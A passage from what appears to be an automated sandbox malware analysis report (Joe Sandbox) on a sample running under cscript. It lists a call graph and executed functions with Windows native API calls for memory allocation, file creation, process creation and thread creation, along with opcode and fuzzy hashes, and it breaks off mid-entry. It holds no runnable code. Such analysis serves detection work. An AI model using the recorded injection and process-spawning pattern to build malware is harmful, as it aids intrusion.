57430->57431 57432 7b019 57431->57432 57432->57157 57434 7ba76 57433->57434 57464 7b740 57434->57464 57436 7badc 57436->57164 57489 7d440 57437->57489 57439 77e41 57439->57147 57440 77c93 57440->57439 57493 833b0 57440->57493 57442 77cf2 57442->57439 57497 77a30 57442->57497 57445 8b260 RtlAllocateHeap 57446 77d39 57445->57446 57447 8b390 2 API calls 57446->57447 57451 77d4e 57447->57451 57448 76e30 3 API calls 57448->57451 57451->57439 57451->57448 57452 770f0 LdrInitializeThunk 57451->57452 57502 7ac10 57451->57502 57536 7d3e0 57451->57536 57452->57451 57454 7d0aa 57453->57454 57458 7d160 57453->57458 57459 88210 57454->57459 57457 88720 NtClose 57457->57458 57458->57421 57458->57422 57460 8822c 57459->57460 57463 26007ac LdrInitializeThunk 57460->57463 57461 7d154 57461->57457 57463->57461 57465 7b757 57464->57465 57470 7d480 57465->57470 57469 7b7cb 57469->57436 57471 7d483 57470->57471 57481 77130 57471->57481 57473 7b79f 57478 88970 57473->57478 57474 83a60 7 API calls 57476 7d4c9 57474->57476 57476->57473 57476->57474 57477 8a0b0 RtlFreeHeap 57476->57477 57488 7d2c0 CreateProcessInternalW LdrInitializeThunk 57476->57488 57477->57476 57479 891f0 57478->57479 57480 8898f CreateProcessInternalW 57479->57480 57480->57469 57482 7722f 57481->57482 57483 77145 57481->57483 57482->57476 57483->57482 57484 83a60 7 API calls 57483->57484 57485 771b2 57484->57485 57486 8a0b0 RtlFreeHeap 57485->57486 57487 771d9 57485->57487 57486->57487 57487->57476 57488->57476 57490 7d45f 57489->57490 57491 7d466 SetErrorMode 57490->57491 57492 7d46d 57490->57492 57491->57492 57492->57440 57494 833c0 57493->57494 57540 7d210 57494->57540 57496 833d6 57496->57442 57498 8a030 NtAllocateVirtualMemory 57497->57498 57501 77a55 57498->57501 57499 77c6a 57499->57445 57501->57499 57557 87b10 57501->57557 57503 7ac2f 57502->57503 57504 7ac29 57502->57504 57607 78630 57503->57607 57598 7ccd0 57504->57598 57507 7ac3c 57508 8b390 2 API calls 57507->57508 57535 7aec8 57507->57535 57509 7ac58 57508->57509 57510 7d3e0 LdrInitializeThunk 57509->57510 57511 7ac6c 57509->57511 57510->57511 57512 88190 LdrInitializeThunk 57511->57512 57518 7ad96 57511->57518 57511->57535 57513 7acea 57512->57513 57515 7acf6 57513->57515 57513->57518 57514 7adbd 57517 88720 NtClose 57514->57517 57516 7ad3f 57515->57516 57519 882a0 LdrInitializeThunk 57515->57519 57515->57535 57521 88720 NtClose 57516->57521 57520 7adc7 57517->57520 57518->57514 57525 7ade6 57518->57525 57519->57516 57520->57451 57522 7ad5c 57521->57522 57613 875c0 57522->57613 57524 7ad73 57524->57535 57616 77290 57524->57616 57624 7a920 NtClose LdrInitializeThunk LdrInitializeThunk 57525->57624 57529 7ae36 57530 88720 NtClose 57529->57530 57531 7ae9b 57530->57531 57532 88720 NtClose 57531->57532 57533 7aea5 57532->57533 57534 77290 3 API calls 57533->57534 57533->57535 57534->57535 57535->57451 57537 7d3f3 57536->57537 57664 88120 57537->57664 57541 7d22d 57540->57541 57547 88250 57541->57547 57544 7d275 57544->57496 57548 8826c 57547->57548 57555 25fffb4 LdrInitializeThunk 57548->57555 57549 7d26e 57549->57544 57551 882a0 57549->57551 57552 882bc 57551->57552 57556 25ffc60 LdrInitializeThunk 57552->57556 57553 7d29e 57553->57496 57555->57549 57556->57553 57558 8a280 RtlAllocateHeap 57557->57558 57559 87b27 57558->57559 57576 78170 57559->57576 57561 87b42 57562 87b69 57561->57562 57563 87b80 57561->57563 57564 8a0b0 RtlFreeHeap 57562->57564 57565 8a030 NtAllocateVirtualMemory 57563->57565 57566 87b76 57564->57566 57567 87bba 57565->57567 57566->57499 57568 8a030 NtAllocateVirtualMemory 57567->57568 57569 87bd3 57568->57569 57570 87e60 57569->57570 57573 87e74 57569->57573 57571 8a0b0 RtlFreeHeap 57570->57571 57572 87e6a 57571->57572 57572->57499 57574 8a0b0 RtlFreeHeap 57573->57574 57575 87ec9 57574->57575 57575->57499 57577 78195 57576->57577 57582 79b50 57577->57582 57581 781ed 57581->57561 57583 79b74 57582->57583 57584 781c8 57583->57584 57585 79bb0 LdrLoadDll 57583->57585 57584->57581 57586 7b350 57584->57586 57585->57584 57587 7b37c 57586->57587 57588 7b39c 57587->57588 57593 884b0 57587->57593 57588->57581 57590 7b3bf 57590->57588 57591 88720 NtClose 57590->57591 57592 7b3fa 57591->57592 57592->57581 57594 884cc 57593->57594 57597 25ffbb8 LdrInitializeThunk 57594->57597 57595 884e7 57595->57590 57597->57595 57625 7bdc0 57598->57625 57600 7cce7 57606 7cd00 57600->57606 57632 73d70 57600->57632 57602 8a280 RtlAllocateHeap 57604 7cd0e 57602->57604 57603 7ccfa 57645 87440 57603->57645 57604->57503 57606->57602 57608 7864b 57607->57608 57609 7d090 2 API calls 57608->57609 57611 78761 57608->57611 57610 7874c 57609->57610 57610->57611 57612 88720 NtClose 57610->57612 57611->57507 57612->57611 57614 7d3e0 LdrInitializeThunk 57613->57614 57615 875f2 57614->57615 57615->57524 57617 772a8 57616->57617 57618 79b50 LdrLoadDll 57617->57618 57619 772c3 57618->57619 57620 7730d 57619->57620 57621 772dc PostThreadMessageW 57619->57621 57620->57451 57621->57620 57622 772f0 57621->57622 57623 772fa PostThreadMessageW 57622->57623 57623->57620 57624->57529 57626 7bdf3 57625->57626 57627 7d210 2 API calls 57626->57627 57628 7be5d 57627->57628 57629 7be64 57628->57629 57649 8a2c0 RtlAllocateHeap 57628->57649 57629->57600 57631 7be74 57631->57600 57633 73d96 57632->57633 57634 7b350 2 API calls 57633->57634 57636 73e61 57634->57636 57635 73e68 57635->57603 57636->57635 57650 7b410 57636->57650 57640 74083 57641 8a030 NtAllocateVirtualMemory 57640->57641 57642 74110 57641->57642 57643 8a030 NtAllocateVirtualMemory 57642->57643 57644 7412a 57643->57644 57644->57603 57646 87461 57645->57646 57647 87487 57646->57647 57648 87474 CreateThread 57646->57648 57647->57606 57648->57606 57649->57631 57651 7b435 57650->57651 57658 88320 57651->57658 57654 883b0 57655 883cc 57654->57655 57663 25ffab8 LdrInitializeThunk 57655->57663 57656 883eb 57656->57640 57659 8833c 57658->57659 57662 25ffb50 LdrInitializeThunk 57659->57662 57660 7405c 57660->57640 57660->57654 57662->57660 57663->57656 57665 8812a 57664->57665 57668 25ffd8c LdrInitializeThunk 57665->57668 57666 7d41e 57666->57451 57668->57666 57669 87310 57670 8a030 NtAllocateVirtualMemory 57669->57670 57672 8734b 57669->57672 57670->57672 57671 8742c 57672->57671 57673 79b50 LdrLoadDll 57672->57673 57675 87381 57673->57675 57674 873b0 Sleep 57674->57675 57675->57671 57675->57674 57676 25ff900 LdrInitializeThunk

                                        Executed Functions

                                        Function 000885EE Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41filenativeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 264 885ee-88641 call 891f0 NtCreateFile
                                        APIs
                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,00083BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00083BC7,007A002E,00000000,00000060,00000000,00000000), ref: 0008863D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.668980858.0000000000070000.00000040.80000000.00040000.00000000.sdmp, Offset: 00070000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_70000_cscript.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID: .z`
                                        • API String ID: 823142352-1441809116
                                        • Opcode ID: efaf236f6932391a4319b5dc966df500b55e8b82575157d43ba990d33b0f128c
                                        • Instruction ID: 045dc065eaa7a6bdc89d34a5981789d5dda8358205a71e6571814d1ecae005cf
                                        • Opcode Fuzzy Hash: efaf236f6932391a4319b5dc966df500b55e8b82575157d43ba990d33b0f128c
                                        • Instruction Fuzzy Hash: 2201AFB2201108AFCB58DF99DC85EEB77A9BF8C754F158248FA0D97241CA30E811CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000885F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 267 885f0-88606 268 8860c-88641 NtCreateFile 267->268 269 88607 call 891f0 267->269 269->268
                                        APIs
                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,00083BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00083BC7,007A002E,00000000,00000060,00000000,00000000), ref: 0008863D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.668980858.0000000000070000.00000040.80000000.00040000.00000000.sdmp, Offset: 00070000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_70000_cscript.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID: .z`
                                        • API String ID: 823142352-1441809116
                                        • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                        • Instruction ID: eb122d4c2d80893ffb81857da3b8f038703251712a6cf1210ae1e6f1dfd19d3c
                                        • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                        • Instruction Fuzzy Hash: 66F0B2B2204208ABCB08DF88DC85EEB77ADBF8C754F158248BA0D97241C630E811CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000886A0 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtReadFile.NTDLL(00083D82,5E972F65,FFFFFFFF,00083A41,?,?,00083D82,?,00083A41,FFFFFFFF,5E972F65,00083D82,?,00000000), ref: 000886E5
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.668980858.0000000000070000.00000040.80000000.00040000.00000000.sdmp, Offset: 00070000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_70000_cscript.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                        • Instruction ID: f04ecf9bdb8438be51d55b222892f8293c2765b4262b70a4511d40b4bcd47392
                                        • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                        • Instruction Fuzzy Hash: 69F0A4B2200208ABCB14DF89DC85EEB77ADBF8C754F158248BE1D97241DA30E811CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000887D0 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00072D11,00002000,00003000,00000004), ref: 00088809
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.668980858.0000000000070000.00000040.80000000.00040000.00000000.sdmp, Offset: 00070000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_70000_cscript.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateMemoryVirtual
                                        • String ID:
                                        • API String ID: 2167126740-0
                                        • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                        • Instruction ID: 5300a0893fbe48d924afd3ff6b00564ae1f056afb5697cfc0f2179acf88607a8
                                        • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                        • Instruction Fuzzy Hash: D1F015B2200208ABCB14EF89CC85EEB77ADBF88750F158148BE0997242C630F810CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0008871C Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtClose.NTDLL(00083D60,?,?,00083D60,00000000,FFFFFFFF), ref: 00088745
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.668980858.0000000000070000.00000040.80000000.00040000.00000000.sdmp, Offset: 00070000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_70000_cscript.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Close
                                        • String ID:
                                        • API String ID: 3535843008-0
                                        • Opcode ID: c54629cc25dd830b89ba116df572174a6f889b562a3d860b8f19ed76428ef998
                                        • Instruction ID: ddc32b9d390e6552a586c5aa78a7ac40d7f5409c9d85e81b86869e6245d3925c
                                        • Opcode Fuzzy Hash: c54629cc25dd830b89ba116df572174a6f889b562a3d860b8f19ed76428ef998
                                        • Instruction Fuzzy Hash: 60E0C2392001006FDB10EF98CC88FE77B69EF44310F094099BA599B343C530E500C7A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00088720 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtClose.NTDLL(00083D60,?,?,00083D60,00000000,FFFFFFFF), ref: 00088745
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.668980858.0000000000070000.00000040.80000000.00040000.00000000.sdmp, Offset: 00070000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_70000_cscript.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Close
                                        • String ID:
                                        • API String ID: 3535843008-0
                                        • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                        • Instruction ID: da4302ca554f1b51da9d239c75d80c97ad6d72db613f9c8272f782a3f79de792
                                        • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                        • Instruction Fuzzy Hash: EBD012752002146BD710EB98CC89EE7775CEF44750F154455BA595B242C530F50087E0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 026000C4 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.669430082.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: true
                                        • Associated: 00000007.00000002.669421162.00000000025E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669517370.00000000026D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669524373.00000000026E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669530863.00000000026E4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669537783.00000000026E7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669544839.00000000026F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669584383.0000000002750000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_25e0000_cscript.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                        • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                        • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                        • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 026007AC Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.669430082.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: true
                                        • Associated: 00000007.00000002.669421162.00000000025E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669517370.00000000026D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669524373.00000000026E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669530863.00000000026E4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669537783.00000000026E7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669544839.00000000026F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669584383.0000000002750000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_25e0000_cscript.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                        • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                        • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                        • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 025FFAD0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.669430082.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: true
                                        • Associated: 00000007.00000002.669421162.00000000025E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669517370.00000000026D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669524373.00000000026E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669530863.00000000026E4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669537783.00000000026E7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669544839.00000000026F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669584383.0000000002750000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_25e0000_cscript.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                        • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                        • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                        • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 025FFAE8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.669430082.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: true
                                        • Associated: 00000007.00000002.669421162.00000000025E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669517370.00000000026D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669524373.00000000026E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669530863.00000000026E4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669537783.00000000026E7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669544839.00000000026F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669584383.0000000002750000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_25e0000_cscript.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                        • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                        • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                        • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 025FFAB8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.669430082.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: true
                                        • Associated: 00000007.00000002.669421162.00000000025E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669517370.00000000026D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669524373.00000000026E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669530863.00000000026E4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669537783.00000000026E7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669544839.00000000026F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669584383.0000000002750000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_25e0000_cscript.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                        • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                        • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                        • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 025FFB50 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.669430082.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: true
                                        • Associated: 00000007.00000002.669421162.00000000025E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669517370.00000000026D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669524373.00000000026E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669530863.00000000026E4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669537783.00000000026E7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669544839.00000000026F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669584383.0000000002750000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_25e0000_cscript.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                        • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                        • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                        • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 025FFB68 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.669430082.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: true
                                        • Associated: 00000007.00000002.669421162.00000000025E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669517370.00000000026D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669524373.00000000026E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669530863.00000000026E4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669537783.00000000026E7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669544839.00000000026F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669584383.0000000002750000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_25e0000_cscript.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                        • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                        • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                        • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 025FFBB8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.669430082.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: true
                                        • Associated: 00000007.00000002.669421162.00000000025E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669517370.00000000026D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669524373.00000000026E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669530863.00000000026E4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669537783.00000000026E7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669544839.00000000026F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669584383.0000000002750000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_25e0000_cscript.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                        • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                        • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                        • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 025FF900 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.669430082.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: true
                                        • Associated: 00000007.00000002.669421162.00000000025E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669517370.00000000026D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669524373.00000000026E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669530863.00000000026E4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669537783.00000000026E7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669544839.00000000026F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669584383.0000000002750000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_25e0000_cscript.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                        • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
